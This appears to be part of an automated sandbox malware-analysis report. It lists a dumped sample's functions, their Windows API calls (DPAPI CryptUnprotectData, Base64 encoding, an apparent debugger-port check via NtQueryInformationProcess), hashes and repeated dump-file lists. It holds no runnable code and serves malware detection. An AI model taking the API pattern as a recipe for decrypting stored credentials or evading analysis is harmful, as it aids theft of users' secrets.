Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID: DPAPI
API String ID: 2068576380-1690256801
Opcode ID: d61e9c4222b463a1e031dcc187fb41231df0bcb94f49f61feb90d8bcd4798180
Instruction ID: 50a65be5faeec108013de7663cc08afb88cac270ab14333a5316d638410cdb4e
Opcode Fuzzy Hash: d61e9c4222b463a1e031dcc187fb41231df0bcb94f49f61feb90d8bcd4798180
Instruction Fuzzy Hash: 3701FFB5E05218EFCF40EFA8D98889EBBB9FF48754B118466E906E7340D7719E05CB90

Function 00091E5D Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,00000000,002DE908,?,?,?,000928A1,?,?,00000000), ref: 00091E7D
GetProcessHeap.KERNEL32(00000000,?,?,?,?,000928A1,?,?,00000000), ref: 00091E8A
HeapAlloc.KERNEL32(00000000,?,?,?,000928A1,?,?,00000000), ref: 00091E91

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: Heap$AllocBinaryCryptProcessString
String ID:
API String ID: 1871034439-0
Opcode ID: 8ad2ccb68b7e62f38234a374ffbd9528eb25944b8c5ad7cda1c812953dfc57a1
Instruction ID: b04dcfa922302052c9d4535ff40150eda35291754237f555204a7299bf7798d2
Opcode Fuzzy Hash: 8ad2ccb68b7e62f38234a374ffbd9528eb25944b8c5ad7cda1c812953dfc57a1
Instruction Fuzzy Hash: B3014870A00209BFDF11AF61EC888AF7BBAFF497A4B248569F84587210D7319D50EA60

Function 00088048 Relevance: 6.0, APIs: 4, Instructions: 42encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32(00086724,00000000,00000001,00000000,?,00000000,00000000), ref: 00088060
LocalAlloc.KERNEL32(00000040,?,?,?,00086724,?), ref: 0008806E
CryptStringToBinaryA.CRYPT32(00086724,00000000,00000001,00000000,?,00000000,00000000), ref: 00088084
LocalFree.KERNEL32(?,?,?,00086724,?), ref: 00088093

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID:
API String ID: 4291131564-0
Opcode ID: ecc0461930b3791067f7b9d93d7d78beb0bce1b4e1ed0260137e51383f66f6fe
Instruction ID: 90c34a9b3a240bfa88a07ae535e9b513ce36b04d64ea4d74752b6b178f2db99b
Opcode Fuzzy Hash: ecc0461930b3791067f7b9d93d7d78beb0bce1b4e1ed0260137e51383f66f6fe
Instruction Fuzzy Hash: 07F0C470502234BBDF716F66EC4DE8B7FA8EF0ABA0B504455F909EA250E6718940DBA1

Function 0009C0E9 Relevance: 3.1, APIs: 2, Instructions: 63timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,759183C0,00000000,?,?,?,?,?,?,?,?,0009C5A4,?), ref: 0009C13E
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,0009C5A4,?), ref: 0009C14C

Part of subcall function 0009B92A: FileTimeToSystemTime.KERNEL32(?,?,?,?,0009C211,?,?,?,?,?,?,?,?,?,?,0009C5B4), ref: 0009B942

Part of subcall function 0009B906: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0009B923

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: Time$FileSystem$LocalUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 568878067-0
Opcode ID: c99a32d743242c1da9cb954ef6f3b58c9a00cd5038c98ff11f9d8c4cf5f7fb0b
Instruction ID: d0a09ef7f2578451d2a39f1583a5412450d1381119217514c886a2d6676e5486
Opcode Fuzzy Hash: c99a32d743242c1da9cb954ef6f3b58c9a00cd5038c98ff11f9d8c4cf5f7fb0b
Instruction Fuzzy Hash: A921E4B19002099FDF48DFA9D9806EE7BF5FF08300F1045AAE949EA21AE7349945DB60

Function 0008145B Relevance: 3.0, APIs: 2, Instructions: 22nativeCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000007,00000000,00000004,00000000), ref: 0008146D
NtQueryInformationProcess.NTDLL(00000000), ref: 00081474

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: Process$CurrentInformationQuery
String ID:
API String ID: 3953534283-0
Opcode ID: 1666071c1afa3758379cd7b16c3f81852311bd519628eb934d4322caea67abe4
Instruction ID: e769d1f8043fa6ac7ca6b1c8b3a82daa775de167bb9fda04eb9b3ed725ddf0eb
Opcode Fuzzy Hash: 1666071c1afa3758379cd7b16c3f81852311bd519628eb934d4322caea67abe4
Instruction Fuzzy Hash: 69E01271A50204F7EF50ABA0ED0AF9E73ECAB00749F201165A316E60C0D6B8DA019765

Function 000AB556 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

EnumSystemLocalesA.KERNEL32(Function_0002B1C1,00000001), ref: 000AB56F

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: c54ba89e86607b31fc916f06672c2ec04e300fbdd0454ddaa9aae76d096e16a0
Instruction ID: 2bdd4ea978680dc76daea32ba103bbf102a8e240adf418692865b33b7a4f4f47
Opcode Fuzzy Hash: c54ba89e86607b31fc916f06672c2ec04e300fbdd0454ddaa9aae76d096e16a0
Instruction Fuzzy Hash: F7D05E71A507009BE7204F749D497E17BE0EB12B16F609D49DD92490C1D7B4A5858600

Function 000A762E Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000275EC), ref: 000A7633

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 257806282b8ec24e15f0fae0c025f55b270f58567843e56bfa7196d2087927f9
Instruction ID: 7f1fa0d1f7bb9cf3c5f13c0bac5e6432931aef7b4cc33988384861b555505063
Opcode Fuzzy Hash: 257806282b8ec24e15f0fae0c025f55b270f58567843e56bfa7196d2087927f9
Instruction Fuzzy Hash: 7F9002A165964046D60517B55C4D44635986B4A706B414950A105C8054DBD4C1005911

Function 000ACD2E Relevance: .5, Instructions: 489COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abfa737703aeb423bcf38effd35900a43ae248d3dc3f5dd7af2df4a19ed5bb61
Instruction ID: 1b8f956b2a307819b8c8f833c1d247a2e51d99d13fb52c217f658e52c337c164
Opcode Fuzzy Hash: abfa737703aeb423bcf38effd35900a43ae248d3dc3f5dd7af2df4a19ed5bb61
Instruction Fuzzy Hash: 9B02A233D496F24B8BB24EF948906267FE15F03B5031F86AADDD13F596C212ED0696E0

Function 000ADD1B Relevance: .4, Instructions: 355COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
Instruction ID: fee1c4bdf89745701fb2071b9021c33857be11a7d366cf50063143fc8661b92a
Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
Instruction Fuzzy Hash: 0CC17273D0A5B24987B586BD481823FFEA26F93B4131FC3A6DCD13F689C6226D0295D0

Function 000AD933 Relevance: .3, Instructions: 349COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
Instruction ID: fbbc9058b3db123bb067d004e063cd6bef6b0de05b47e1bfaba0a2c4ca7a3b46
Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
Instruction Fuzzy Hash: 9EC16F73D1E5B2458BB645BD481823FFAA26F93B4031F8397DCD13FA89C222AD0695D0

Function 000AD561 Relevance: .3, Instructions: 332COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
